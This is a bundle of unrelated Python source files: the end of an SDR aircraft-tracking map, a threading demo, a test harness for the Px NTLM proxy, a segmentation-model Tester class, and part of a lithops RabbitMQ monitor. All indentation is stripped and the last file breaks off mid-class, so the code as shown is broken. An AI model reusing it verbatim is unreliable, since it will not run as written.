now = time.time()
with traffic_l:
for addr, plane in traffic.items():
age = now - plane.seen
if age > 60: # If the plane hasn't been heard from in over a minute
ded.append(addr) # Mark this plane for deletion
continue
ghost = 'Ghost' if age > 30 else '' # If the plane is starting to get old, make it a ghost
if plane.pos and plane.hdg: # Only show an aircraft if it has all the necessary data. Callsign messages are fairly rare and also non-critical
active += 1
new_plane_data['addr'].append(addr)
new_plane_data['img'].append(wdir + 'static/Sprites/' + plane.sprite + ghost + '.png')
pos.append(plane.pos[-1])
azi.append(plane.azi) # This seems to be defined as anti-clockwise from East for some reason
dst.append(plane.vel * (now - plane.old_t)) # Predicted distance travelled since last position message
new_plane_data['rot'].append(np.radians(315 - plane.hdg)) # Image sprite rotation
new_plane_data['call'].append(plane.call)
new_plane_data['cat'].append(plane.cat)
new_plane_data['alt'].append(plane.alt[-1])
new_plane_data['hdg'].append(plane.hdg)
new_plane_data['spd'].append(plane.gspd if plane.gspd else plane.aspd)
new_shdw_data['img'].append(wdir + 'static/Sprites/' + plane.sprite + ghost + 'Shadow.png')
new_shdw_data['rot'].append(np.radians(315 - plane.hdg))
if len(plane.pos) > 1: # Draw a trail if we have more than one point for this aircraft
pos_hst = np.array(plane.pos)
pos_hst_mct = ccrs.GOOGLE_MERCATOR.transform_points(ccrs.PlateCarree(), pos_hst[:,1], pos_hst[:,0])
new_trail_data['x'].append(pos_hst_mct[:,0])
new_trail_data['y'].append(pos_hst_mct[:,1])
for addr in ded:
# Save a limited amount of the aircraft's data before deletion
pos_hst = np.array(traffic.get(addr).pos)
if len(pos_hst) > 1:
pos_hst_mct = ccrs.GOOGLE_MERCATOR.transform_points(ccrs.PlateCarree(), pos_hst[:,1], pos_hst[:,0])
new_path_data['x'].append(pos_hst_mct[:,0])
new_path_data['y'].append(pos_hst_mct[:,1])
del traffic[addr] # Delete this aircraft
if v: log('Aircraft ' + addr + ' deleted')
pos_est = np.array(geo.direct(pos, azi, dst)) # Estimated positions based on old position and displacement vector
# Note for the confused: transform_points takes coordinates in the form (x, y), which in PlateCaree coordinates ends up as Lon, Lat (instead of the usual Lat, Lon)
pos_mct = ccrs.GOOGLE_MERCATOR.transform_points(ccrs.PlateCarree(), pos_est[:,1], pos_est[:,0])
# hb gives all hitbox circles a screen-size of 60. Any phantom circles won't have a size and therefore won't appear. Hopefully.
new_plane_data.update(x = pos_mct[:,0], y = pos_mct[:,1], hb = [60] * active)
new_shdw_data.update(x = pos_mct[:,0], y = pos_mct[:,1] - np.array(new_plane_data['alt'])/50) # Offset the shadow vertically based on altitude
planeSprites.stream(new_plane_data, active)
planeShdws.stream(new_shdw_data, active)
planeTrails.stream(new_trail_data, active)
planePaths.stream(new_path_data, 100) # Remember 100 aircraft. Remembering too many could cause performance issues
def stop(ctxt):
log('...Stopping program...')
cease.set() # Stop the parsing thread
# Wait for threads to finish
t_parse.join()
log('...Closing TCP connection...')
s.close() # Close the TCP connection
log('...Closing dump1090...')
dmp.terminate() # Exit dump1090
log('Goodbye')
f_log.close()
sys.exit(0) # sys.exit works perfectly fine here for some reason
# Stop the server when the browser window is closed
curdoc().on_session_destroyed(stop) # This can sometimes take quite a while
# Changing --check-unused-sessions or --unused-session-lifetime on server startup might fix this
# When run as a bokeh server, a different namespace is used
wdir = '' if __name__ == '__main__' else 'sdr_adsb/'
f_log = open(wdir + 'log.txt', 'w')
log('...Initialising...')
log('...Starting Dump1090...')
if platform.system() == 'Windows':
dmp = Popen([wdir + 'static/dump1090-win.1.10.3010.14/dump1090', '--net', '--quiet'])
else:
dmp = Popen([wdir + 'static/dump1090-master/dump1090', '--net', '--quiet'])
# Connect to Dump1090's TCP stream
HOST = '127.0.0.1'
PORT = 30002
log('...Connecting to Dump1090 at ' + HOST + ' on port {:d}...'.format(PORT))
s = sock.socket(sock.AF_INET, sock.SOCK_STREAM)
# If Dump doesn't start up before execution makes it here, the system actively refuses the connection, and no amount of timeout will help.
# Retry connection every second for 10 seconds
try:
for i in range(0, 10):
try: s.connect((HOST, PORT))
except ConnectionRefusedError: # The expected error when the system refuses the connection
time.sleep(1)
# Need to redefine the socket on Unix after an attempted connection otherwise it gives an invalid argument error on the next connection attempt
if platform.system() != 'Windows':
s = sock.socket(sock.AF_INET, sock.SOCK_STREAM)
if i == 9:
raise
except: # In case we get any other kind of error
raise
else:
break # If we didn't get an error, connection succeeded!
except Exception as e:
log('Unable to connect: ' + repr(e))
dmp_stat = dmp.poll()
if dmp_stat:
log('Dump1090 encountered an error, check the dongle is plugged in properly')
elif dmp_stat is None:
log('Dump1090 seems to be working fine, but couldn\'t be connected to\n\
Try checking the permissions for ' + HOST + ':' + repr(PORT))
dmp.terminate() # dump1090 is still running if its status is None, kill it
else:
log('Dump1090 quit unexpectedly')
log('...Exiting...')
f_log.close()
collect()
_exit(1) # This is not a clean exit, but it's the only one that works (sys.exit raises an exception, but does not stop the server)
strm = s.makefile() # Convert it to a file-like object to make use of the newlines dump1090 spits out
log('Connected')
log('...Starting parse thread...')
# Create threads
cease = Event() # Informs the parsing thread when it's time to end
traffic = {} # Used to store aircraft data
traffic_l = Lock() # Thread safety
t_parse = Thread(target = parser, args = [strm, traffic])
t_parse.start()
log('...Creating map...')
u_lat, u_lon = ip('me').latlng # User's position. Can sometimes be quite inaccurate
log('User found at {:.5f} N, {:.5f} E'.format(u_lat, u_lon))
u_pos = ccrs.GOOGLE_MERCATOR.transform_point(u_lon, u_lat, ccrs.PlateCarree())
# Create an empty plot in Mercator coordinates. sizing_mode expands the plot to fill the whole screen
# Important note: cartopy has two types of Mercator projections: Mercator() and GOOGLE_MERCATOR which are slightly different
# bokeh's implementation of the Mercator projection is equivalent to cartopy's GOOGLE_MERCATOR projection (hence its use in atc())
p = figure(x_range=(u_pos[0] - 200000, u_pos[0] + 200000), y_range=(u_pos[1] - 200000, u_pos[1] + 200000), x_axis_type="mercator", y_axis_type="mercator",
toolbar_location = None, tools = 'pan,wheel_zoom', sizing_mode = 'stretch_both')
# Map selection:
#p.add_tile(WMTSTileSource(url = 'https://tiles.basemaps.cartocdn.com/dark_all/{z}/{x}/{y}@2x.png'))
p.add_tile(WMTSTileSource(url = 'https://maps.wikimedia.org/osm-intl/{Z}/{X}/{Y}@2x.png'))
#p.add_tile(WMTSTileSource(url = 'http://c.tile.stamen.com/watercolor/{Z}/{X}/{Y}.jpg'))
p.select_one(WheelZoomTool).zoom_on_axis = False # Disable single axis zooming
p.toolbar.active_scroll = p.select_one(WheelZoomTool) # Make the scroll wheel the active zoom tool
# Define the glyphs for the plot. Some of these arguments correspond to ColumnDataSource columns
# Due to an issue with bokeh, image sprites cannot be rotated about their centres, hence the requirement for all noses in the top-left
plane_sprite = ImageURL(url = 'img', x = 'x', y = 'y', w = None, h = None, angle = 'rot', anchor = 'top_left')
plane_shdw = ImageURL(url = 'img', x = 'x', y = 'y', w = None, h = None, angle = 'rot', anchor = 'top_left')
# Make-shift hitbox for tooltips since image glyphs don't support the hovertool
circ = Circle(x = 'x', y = 'y', size = 'hb', line_alpha = 0, fill_alpha = 0)
plane_trail = MultiLine(xs = 'x', ys = 'y', line_color = '#FFFF00', line_width = 2)
plane_trail_shdw = MultiLine(xs = 'x', ys = 'y', line_color = '#000000', line_width = 4)
plane_paths = MultiLine(xs = 'x', ys = 'y', line_color = '#0000FF', line_width = 3, line_alpha = 0.2, line_cap = 'round', line_join = 'round')
# The order of these is important, and determines which glyphs are rendered on top of others. The later a glyph is added, the higher its level
p.add_glyph(planePaths, plane_paths) # Historic flight paths
p.add_glyph(planeTrails, plane_trail_shdw) # Aircraft trail borders
p.add_glyph(planeTrails, plane_trail) # Aircraft trails
p.add_glyph(planeShdws, plane_shdw) # Aircraft shadows
ccl = p.add_glyph(planeSprites, circ) # Aircraft tooltip hitboxes
p.add_glyph(planeSprites, plane_sprite) # Aircraft sprites
# Tooltips (restricted to only appear for the make-shift hitboxes)
p.add_tools(HoverTool(renderers = [ccl],
tooltips = [('ICAO', '@addr'), ('Flight', '@call'), ('Category', '@cat'), ('Altitude', '@alt ft'), ('Heading', '@hdg°'), ('Speed', '@spd kt')]))
curdoc().add_root(p) # Add the plot to the window
curdoc().title = "SDR Aircraft Tracker" # Give the window a name
curdoc().add_periodic_callback(atc, 100) # Update map every 100 ms
log('Initialisation complete')
|
start_new_threads.py
|
from threading import Thread
def my_function():
print("printing from thread")
if __name__ == "__main__":
threads = [Thread(target=my_function) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
|
test.py
|
import multiprocessing
import os
import re
import shutil
import socket
import subprocess
import sys
import time
import traceback
import psutil
CURL = 'curl.exe -s -L -k -A "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36" -H "Accept-Language: en-US"'
CURL_PROXY = ' --proxy-ntlm '
BASEURL = ""
PROXY = ""
TESTS = []
try:
ConnectionRefusedError
except NameError:
ConnectionRefusedError = socket.error
def exec_output(cmd):
pipe = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT).stdout
if pipe is not None:
output = pipe.read().decode("UTF-8", "ignore")
else:
print("Error running curl")
sys.exit()
return output
def curl(url, proxy="", ntlm=False, filename="", head=False):
output = ""
cmd = CURL
if filename:
cmd += " -o " + filename
if head:
cmd += ' -I'
if proxy:
cmd += " --proxy " + proxy
if ntlm:
cmd += ' --proxy-ntlm -U :'
cmd += ' "%s"' % url
if "--debug" in sys.argv:
print(cmd)
return exec_output(cmd)
def getPyversion(cmd):
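# Illustrative: "Python 3.5.2" -> 352; runTest() multiplies this by 10 to derive a distinct proxy port per Python version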
return int(exec_output(cmd + " -V").split(" ")[1].replace(".", ""))
def write(data, file):
with open(file, "w") as f:
f.write(data)
def check(url, proxy, port):
start = time.time()
a = curl(url, proxy=proxy, ntlm=True)
end = time.time()
ta = end - start
b = curl(url, proxy="localhost:%d" % port)
tb = time.time() - end
la = len(a)
lb = len(b)
out = 100
if la < lb:
out = la / lb * 100
elif la > lb:
out = lb / la * 100
print(" %.2f%%\t%.2fx\t%s" % (out, tb / ta, url))
def waitprocs(procs):
ret = True
while len(procs):
for i in range(len(procs)):
if not procs[i].is_alive():
if procs[i].exitcode:
ret = False
procs.pop(i)
break
time.sleep(0.1)
return ret
def run(base, port):
if not checkPxStart("localhost", port):
return False
start = time.time()
pop = ""
while True:
pop = curl(base, proxy="localhost:%d" % port)
if pop == "":
time.sleep(0.5)
else:
break
procs = []
#urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', pop)
urls = re.findall("http[s]?://[a-zA-Z_./0-9-]+", pop)
if len(urls) == 0:
print("No urls found")
return False
for url in set(urls):
p = multiprocessing.Process(target=check, args=(url, PROXY, port))
#p.daemon = True
p.start()
procs.append(p)
time.sleep(0.5)
ret = True
if not waitprocs(procs):
ret = False
end = time.time()
print((" Time: %.2fs" % (end-start)) + " sec")
return ret
def runPxTest(cmd, testproc, ips, port, proxy):
global PROXY
PROXY = proxy
pipe = subprocess.Popen("cmd /k start /wait /min " + cmd + " --port=" + str(port), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ret = testproc(ips, port)
pxproc = psutil.Process(pipe.pid)
for child in pxproc.children(recursive=True):
try:
child.kill()
except psutil.NoSuchProcess:
pass
try:
pxproc.kill()
except:
pass
time.sleep(0.5)
return ret
def runTest(test, python, count):
port = 3129
cmd = "px "
if python:
port = getPyversion(python) * 10
cmd = python + " px.py "
cmd += "--debug --uniqlog " + test[0] + " --port=" + str(port)
testproc = test[1]
ips = test[2]
print("Test %d: \"" % count + test[0] + "\" on port " + str(port))
p = multiprocessing.Process(target=runPxTest, args=(cmd, testproc, ips, port, PROXY))
p.start()
return p
def getips():
localips = [ip[4][0] for ip in socket.getaddrinfo(socket.gethostname(), 80, socket.AF_INET)]
localips.insert(0, "127.0.0.1")
return localips
def checkPxStart(ip, port):
# Make sure Px starts
retry = 20
while True:
try:
socket.create_connection((ip, port), 2)
break
except (socket.timeout, ConnectionRefusedError):
time.sleep(1)
retry -= 1
if retry == 0:
print("Px didn't start")
return False
return True
# Test --listen and --port, --hostonly, --gateway and --allow
def checkCommon(ips, port, checkProc):
if ips == [""]:
ips = ["127.0.0.1"]
if port == "":
port = "3128"
port = int(port)
if not checkPxStart(ips[0], port):
return False
localips = getips()
for lip in localips:
for pport in set([3128, port]):
sys.stdout.write(" Checking: " + lip + ":" + str(pport) + " = ")
ret = checkProc(lip, pport)
sys.stdout.write(str(ret) + ": ")
if ((lip not in ips or port != pport) and ret is False) or (lip in ips and port == pport and ret is True):
print("Passed")
else:
print("Failed")
return False
return True
def checkSocket(ips, port):
def checkProc(lip, pport):
try:
socket.create_connection((lip, pport), 2)
except (socket.timeout, ConnectionRefusedError):
return False
return True
return checkCommon(ips, port, checkProc)
def checkFilter(ips, port):
def checkProc(lip, port):
rcode = subprocess.call("curl --proxy " + lip + ":" + str(port) + " http://google.com",
stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
sys.stdout.write(str(rcode) + " ")
if rcode == 0:
return True
elif rcode in [7, 52, 56]:
return False
else:
print("Weird curl return " + str(rcode))
sys.exit()
return checkCommon(ips, port, checkProc)
def remoteTest(port, fail=False):
lip = 'echo $SSH_CLIENT ^| cut -d \\\" \\\" -f 1,1'
cmd = os.getenv("REMOTE_SSH")
if cmd is None:
print("Skipping remote test - REMOTE_SSH not set")
return
cmd = cmd + " curl --proxy `%s`:%s --connect-timeout 2 -s http://google.com" % (lip, port)
sys.stdout.write(" Checking: Remote:" + str(port) + " = ")
ret = subprocess.call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if (ret == 0 and not fail) or (ret != 0 and fail):
print(str(ret) + ": Passed")
else:
print(str(ret) + ": Failed")
return False
return True
def hostonlyTest(ips, port):
return checkSocket(ips, port) and remoteTest(port, fail=True)
def gatewayTest(ips, port):
return checkSocket(ips, port) and remoteTest(port)
def allowTest127(ips, port):
return checkFilter(ips, port) and remoteTest(port, fail=True)
def allowTest169(ips, port):
return checkFilter(ips, port) and remoteTest(port, fail=True)
def allowTest192(ips, port):
return checkFilter(ips, port) and remoteTest(port)
def listenTestLocal(ip, port):
return checkSocket([ip], port) and remoteTest(port, fail=True)
def listenTestRemote(ip, port):
return checkSocket([ip], port) and remoteTest(port)
def proxyTest(base, port):
return run(base, port)
def noproxyTest(base, port):
return run(base, port)
def socketTestSetup():
if "--nohostonly" not in sys.argv:
TESTS.append(("--proxy=" + PROXY + " --hostonly", hostonlyTest, getips()))
if "--nogateway" not in sys.argv:
TESTS.append(("--proxy=" + PROXY + " --gateway", gatewayTest, getips()))
if "--noallow" not in sys.argv:
TESTS.append(("--proxy=" + PROXY + " --gateway --allow=127.*.*.*",
allowTest127, [""]))
TESTS.append(("--proxy=" + PROXY + " --gateway --allow=169.*.*.*",
allowTest169, list(filter(lambda x: "169" in x, getips()))))
TESTS.append(("--proxy=" + PROXY + " --gateway --allow=192.*.*.*",
allowTest192, list(filter(lambda x: "192" in x, getips()))))
if "--nolisten" not in sys.argv:
localips = getips()
localips.insert(0, "")
localips.remove("127.0.0.1")
for ip in localips[:3]:
cmd = "--proxy=" + PROXY
if ip != "":
cmd += " --listen=" + ip
testproc = listenTestLocal
if "192" in ip:
testproc = listenTestRemote
TESTS.append((cmd, testproc, ip))
def auto():
# Make temp directory
try:
shutil.rmtree("testrun")
except:
pass
time.sleep(1)
try:
os.makedirs("testrun", exist_ok=True)
except TypeError:
try:
os.makedirs("testrun")
except WindowsError:
pass
os.chdir("testrun")
# Load base px.ini
shutil.copy("../px.ini", ".")
shutil.copy("../px.py", ".")
shutil.copy("../dist/px.exe", ".")
# Setup tests
socketTestSetup()
if "--noproxy" not in sys.argv:
TESTS.append(("--workers=4 --proxy=" + PROXY, proxyTest, BASEURL))
if "--nonoproxy" not in sys.argv:
TESTS.append(("--workers=4 --threads=30 --noproxy=*.*.*.*", noproxyTest, BASEURL))
count = 1
for test in TESTS:
procs = []
# Latest version
procs.append(runTest(test, "c:\\Miniconda\\python", count))
count += 1
# Test different versions of Python
pys = ["27", "34", "35"]
for py in pys:
procs.append(runTest(test, "c:\\Miniconda\\envs\\%s\\python" % py, count))
count += 1
# Run px.exe
procs.append(runTest(test, None, count))
count += 1
if not waitprocs(procs):
break
os.chdir("..")
if __name__ == "__main__":
"""python test.py testproxy.org:80 http://baseurl.com
Point test.py to the NTLM proxy server that Px should connect through
Base URL is some base webpage which will be spidered for URLs to
compare results directly through proxy and through Px"""
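# Illustrative invocation (hypothetical proxy host and base URL):
#   python test.py ntlmproxy.example.com:80 http://intranet.example.com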
if len(sys.argv) > 1:
PROXY = sys.argv[1]
if len(sys.argv) > 2:
BASEURL = sys.argv[2]
if PROXY == "" or BASEURL == "":
sys.exit()
auto()
|
tester.py
|
import os
import os.path as osp
import cv2
import numpy as np
import time
from tqdm import tqdm
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from engine.logger import get_logger
from utils.pyt_utils import load_model, link_file, ensure_dir
from utils.img_utils import pad_image_to_shape, normalize
logger = get_logger()
class Tester(object):
def __init__(self, dataset, class_num, image_mean, image_std, network,
multi_scales, is_flip, devices=0, out_idx=0, threds=3, config=None, logger=None,
verbose=False, save_path=None, show_image=False):
self.dataset = dataset
self.ndata = self.dataset.get_length()
self.class_num = class_num
self.image_mean = image_mean
self.image_std = image_std
self.multi_scales = multi_scales
self.is_flip = is_flip
self.network = network
self.devices = devices
if isinstance(self.devices, int): self.devices = [self.devices]
self.out_idx = out_idx
self.threds = threds
self.config = config
self.logger = logger
self.context = mp.get_context('spawn')
self.val_func = None
self.results_queue = self.context.Queue(self.ndata)
self.verbose = verbose
self.save_path = save_path
if save_path is not None:
ensure_dir(save_path)
self.show_image = show_image
def run(self, model_path, model_indice, log_file, log_file_link):
"""There are four evaluation modes:
1.only eval a .pth model: -e *.pth
2.only eval a certain epoch: -e epoch
3.eval all epochs in a given section: -e start_epoch-end_epoch
4.eval all epochs from a certain started epoch: -e start_epoch-
"""
if '.pth' in model_indice:
models = [model_indice, ]
elif "-" in model_indice:
start_epoch = int(model_indice.split("-")[0])
end_epoch = model_indice.split("-")[1]
models = os.listdir(model_path)
models.remove("epoch-last.pth")
sorted_models = [None] * len(models)
model_idx = [0] * len(models)
for idx, m in enumerate(models):
num = m.split(".")[0].split("-")[1]
model_idx[idx] = num
sorted_models[idx] = m
model_idx = np.array([int(i) for i in model_idx])
down_bound = model_idx >= start_epoch
up_bound = [True] * len(sorted_models)
if end_epoch:
end_epoch = int(end_epoch)
assert start_epoch < end_epoch
up_bound = model_idx <= end_epoch
bound = up_bound * down_bound
model_slice = np.array(sorted_models)[bound]
models = [os.path.join(model_path, model) for model in
model_slice]
else:
models = [os.path.join(model_path,
'epoch-%s.pth' % model_indice), ]
results = open(log_file, 'a')
link_file(log_file, log_file_link)
for model in models:
logger.info("Load Model: %s" % model)
self.val_func = load_model(self.network, model)
result_line, mIoU = self.multi_process_evaluation()
results.write('Model: ' + model + '\n')
results.write(result_line)
results.write('\n')
results.flush()
results.close()
def run_online(self):
"""
eval during training
"""
self.val_func = self.network
self.single_process_evaluation()
def single_process_evaluation(self):
with torch.no_grad():
for idx in tqdm(range(self.ndata)):
dd = self.dataset[idx]
self.func_per_iteration(dd, self.devices[0], iter=idx)
def run_online_multiprocess(self):
"""
eval during training
"""
self.val_func = self.network
self.multi_process_single_gpu_evaluation()
def multi_process_single_gpu_evaluation(self):
# start_eval_time = time.perf_counter()
stride = int(np.ceil(self.ndata / self.threds))
# start multi-process on single-gpu
procs = []
for d in range(self.threds):
e_record = min((d + 1) * stride, self.ndata)
shred_list = list(range(d * stride, e_record))
device = self.devices[0]
logger.info('Thread %d handles %d data items.' % (d, len(shred_list)))
p = self.context.Process(target=self.worker, args=(shred_list, device))
procs.append(p)
for p in procs:
p.start()
for p in procs:
p.join()
def multi_process_evaluation(self):
start_eval_time = time.perf_counter()
nr_devices = len(self.devices)
stride = int(np.ceil(self.ndata / nr_devices))
# start multi-process on multi-gpu
procs = []
for d in range(nr_devices):
e_record = min((d + 1) * stride, self.ndata)
shred_list = list(range(d * stride, e_record))
device = self.devices[d]
logger.info('GPU %s handles %d data items.' % (device, len(shred_list)))
p = self.context.Process(target=self.worker, args=(shred_list, device))
procs.append(p)
for p in procs:
p.start()
for p in procs:
p.join()
def worker(self, shred_list, device):
start_load_time = time.time()
# logger.info('Load Model on Device %d: %.2fs' % (device, time.time() - start_load_time))
for idx in shred_list:
dd = self.dataset[idx]
results_dict = self.func_per_iteration(dd, device, iter=idx)
self.results_queue.put(results_dict)
def func_per_iteration(self, data, device, iter=None):
raise NotImplementedError
def compute_metric(self, results):
raise NotImplementedError
# evaluate the whole image at once
def whole_eval(self, img, output_size, input_size=None, device=None):
if input_size is not None:
img, margin = self.process_image(img, input_size)
else:
img = self.process_image(img, input_size)
pred = self.val_func_process(img, device)
if input_size is not None:
pred = pred[:, margin[0]:(pred.shape[1] - margin[1]),
margin[2]:(pred.shape[2] - margin[3])]
pred = pred.permute(1, 2, 0)
pred = pred.cpu().numpy()
if output_size is not None:
pred = cv2.resize(pred,
(output_size[1], output_size[0]),
interpolation=cv2.INTER_LINEAR)
pred = pred.argmax(2)
return pred
# slide the window to evaluate the image
def sliding_eval(self, img, crop_size, stride_rate, device=None):
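# For each configured scale the image is resized, scored by scale_process() (whole image if it fits within
# crop_size, otherwise in overlapping windows with stride = ceil(crop_size * stride_rate)), and the
# per-class score maps are resized back to the original shape and accumulated before the final argmax.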
ori_rows, ori_cols, c = img.shape
processed_pred = np.zeros((ori_rows, ori_cols, self.class_num))
for s in self.multi_scales:
img_scale = cv2.resize(img, None, fx=s, fy=s,
interpolation=cv2.INTER_LINEAR)
new_rows, new_cols, _ = img_scale.shape
processed_pred += self.scale_process(img_scale,
(ori_rows, ori_cols),
crop_size, stride_rate, device)
pred = processed_pred.argmax(2)
return pred
def scale_process(self, img, ori_shape, crop_size, stride_rate,
device=None):
new_rows, new_cols, c = img.shape
long_size = new_cols if new_cols > new_rows else new_rows
if long_size <= crop_size:
input_data, margin = self.process_image(img, crop_size)
score = self.val_func_process(input_data, device)
score = score[:, margin[0]:(score.shape[1] - margin[1]),
margin[2]:(score.shape[2] - margin[3])]
else:
stride = int(np.ceil(crop_size * stride_rate))
img_pad, margin = pad_image_to_shape(img, crop_size,
cv2.BORDER_CONSTANT, value=0)
pad_rows = img_pad.shape[0]
pad_cols = img_pad.shape[1]
r_grid = int(np.ceil((pad_rows - crop_size) / stride)) + 1
c_grid = int(np.ceil((pad_cols - crop_size) / stride)) + 1
data_scale = torch.zeros(self.class_num, pad_rows, pad_cols).cuda(
device)
count_scale = torch.zeros(self.class_num, pad_rows, pad_cols).cuda(
device)
for grid_yidx in range(r_grid):
for grid_xidx in range(c_grid):
s_x = grid_xidx * stride
s_y = grid_yidx * stride
e_x = min(s_x + crop_size, pad_cols)
e_y = min(s_y + crop_size, pad_rows)
s_x = e_x - crop_size
s_y = e_y - crop_size
img_sub = img_pad[s_y:e_y, s_x: e_x, :]
count_scale[:, s_y: e_y, s_x: e_x] += 1
input_data, tmargin = self.process_image(img_sub, crop_size)
temp_score = self.val_func_process(input_data, device)
temp_score = temp_score[:,
tmargin[0]:(temp_score.shape[1] - tmargin[1]),
tmargin[2]:(temp_score.shape[2] - tmargin[3])]
data_scale[:, s_y: e_y, s_x: e_x] += temp_score
# score = data_scale / count_scale
score = data_scale
score = score[:, margin[0]:(score.shape[1] - margin[1]),
margin[2]:(score.shape[2] - margin[3])]
score = score.permute(1, 2, 0)
data_output = cv2.resize(score.cpu().numpy(),
(ori_shape[1], ori_shape[0]),
interpolation=cv2.INTER_LINEAR)
return data_output
def val_func_process(self, input_data, device=None):
input_data = np.ascontiguousarray(input_data[None, :, :, :], dtype=np.float32)
input_data = torch.FloatTensor(input_data).cuda(device)
with torch.cuda.device(input_data.get_device()):
self.val_func.eval()
self.val_func.to(input_data.get_device())
with torch.no_grad():
score = self.val_func(input_data)
if (isinstance(score, tuple) or isinstance(score, list)) and len(score) > 1:
score = score[self.out_idx]
score = score[0] # a single image pass, ignore batch dim
if self.is_flip:
input_data = input_data.flip(-1)
score_flip = self.val_func(input_data)
score_flip = score_flip[0]
score += score_flip.flip(-1)
score = torch.exp(score)
# score = score.data
return score
def process_image(self, img, crop_size=None):
p_img = img
if img.shape[2] < 3:
im_b = p_img
im_g = p_img
im_r = p_img
p_img = np.concatenate((im_b, im_g, im_r), axis=2)
p_img = normalize(p_img, self.image_mean, self.image_std)
if crop_size is not None:
p_img, margin = pad_image_to_shape(p_img, crop_size, cv2.BORDER_CONSTANT, value=0)
p_img = p_img.transpose(2, 0, 1)
return p_img, margin
p_img = p_img.transpose(2, 0, 1)
return p_img
|
monitor.py
|
#
# Copyright Cloudlab URV 2021
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import pika
import logging
import time
import lithops
import pickle
import sys
import queue
import threading
import concurrent.futures as cf
from tblib import pickling_support
from lithops.constants import MONITORING_INTERVAL
pickling_support.install()
logger = logging.getLogger(__name__)
class Monitor(threading.Thread):
"""
Monitor base class
"""
def __init__(self, executor_id,
internal_storage,
token_bucket_q,
generate_tokens,
config):
super().__init__()
self.executor_id = executor_id
self.futures = []
self.internal_storage = internal_storage
self.should_run = True
self.token_bucket_q = token_bucket_q
self.generate_tokens = generate_tokens
self.config = config
self.daemon = True
# vars for _generate_tokens
self.workers = {}
self.workers_done = []
self.callids_done_worker = {}
self.job_chunksize = {}
self.present_jobs = set()
def add_futures(self, fs, job_id=None, chunksize=None):
"""
Extends the current thread list of futures to track
"""
self.futures.extend(fs)
# this is required for FaaS backends and _generate_tokens
if job_id:
self.job_chunksize[job_id] = chunksize
present_jobs = {f.job_id for f in fs}
for job_id in present_jobs:
self.present_jobs.add(job_id)
def _all_ready(self):
"""
Checks if all futures are ready, success or done
"""
return all([f.ready or f.success or f.done for f in self.futures])
def _check_new_futures(self, call_status, f):
"""Checks if a functions returned new futures to track"""
if 'new_futures' not in call_status:
return False
f._set_futures(call_status)
self.futures.extend(f._new_futures)
logger.debug(f'ExecutorID {self.executor_id} - Got {len(f._new_futures)} new futures to track')
return True
def _future_timeout_checker(self, futures):
"""
Checks if running futures exceeded the timeout
"""
current_time = time.time()
futures_running = [f for f in futures if f.running]
for fut in futures_running:
try:
start_tstamp = fut._call_status['worker_start_tstamp']
fut_timeout = start_tstamp + fut.execution_timeout + 5
if current_time > fut_timeout:
msg = 'The function did not run as expected.'
raise TimeoutError('HANDLER', msg)
except TimeoutError:
# generate fake TimeoutError call status
pickled_exception = str(pickle.dumps(sys.exc_info()))
call_status = {'type': '__end__',
'exception': True,
'exc_info': pickled_exception,
'executor_id': fut.executor_id,
'job_id': fut.job_id,
'call_id': fut.call_id,
'activation_id': fut.activation_id}
fut._set_ready(call_status)
def _print_status_log(self):
"""prints a debug log showing the status of the job"""
callids_pending = len([f for f in self.futures if f.invoked])
callids_running = len([f for f in self.futures if f.running])
callids_done = len([f for f in self.futures if f.ready or f.success or f.done])
logger.debug(f'ExecutorID {self.executor_id} - Pending: {callids_pending} '
f'- Running: {callids_running} - Done: {callids_done}')
class RabbitmqMonitor(Monitor):
def __init__(self, executor_id, internal_storage, token_bucket_q, generate_tokens, config):
super().__init__(executor_id, internal_storage, token_bucket_q, generate_tokens, config)
self.rabbit_amqp_url = config.get('amqp_url')
self.queue = f'lithops-{self.executor_id}'
self._create_resources()
def _create_resources(self):
"""
Creates RabbitMQ queues and exchanges of a given job
"""
logger.debug(f'ExecutorID {self.executor_id} - Creating RabbitMQ queue {self.queue}')
self.pikaparams = pika.URLParameters(self.rabbit_amqp_url)
self.connection = pika.BlockingConnection(self.pikaparams)
channel = self.connection.channel()
channel.queue_declare(queue=self.queue, auto_delete=True)
channel.close()
def _delete_resources(self):
"""
Deletes RabbitMQ queues and exchanges of a given job.
"""
connection = pika.BlockingConnection(self.pikaparams)
channel = connection.channel()
channel.queue_delete(queue=self.queue)
channel.close()
connection.close()
def stop(self):
"""
Stops the monitor thread
"""
self.should_run = False
self._delete_resources()
def _tag_future_as_running(self, call_status):
"""
Assigns a call_status to its future
"""
not_running_futures = [f for f in self.futures if not (f.running or f.ready or f.success or f.done)]
for f in not_running_futures:
calljob_id = (call_status['executor_id'], call_status['job_id'], call_status['call_id'])
if (f.executor_id, f.job_id, f.call_id) == calljob_id:
f._set_running(call_status)
def _tag_future_as_ready(self, call_status):
"""
tags a future as ready based on call_status
"""
not_ready_futures = [f for f in self.futures if not (f.ready or f.success or f.done)]
for f in not_ready_futures:
calljob_id = (call_status['executor_id'], call_status['job_id'], call_status['call_id'])
if (f.executor_id, f.job_id, f.call_id) == calljob_id:
if not self._check_new_futures(call_status, f):
f._set_ready(call_status)
def _generate_tokens(self, call_status):
"""
generates a new token for the invoker
"""
if not self.generate_tokens or not self.should_run:
return
call_id = (call_status['executor_id'], call_status['job_id'], call_status['call_id'])
worker_id = call_status['activation_id']
if worker_id not in self.callids_done_worker:
self.callids_done_worker[worker_id] = []
self.callids_done_worker[worker_id].append(call_id)
if worker_id not in self.workers_done and \
len(self.callids_done_worker[worker_id]) == call_status['chunksize']:
self.workers_done.append(worker_id)
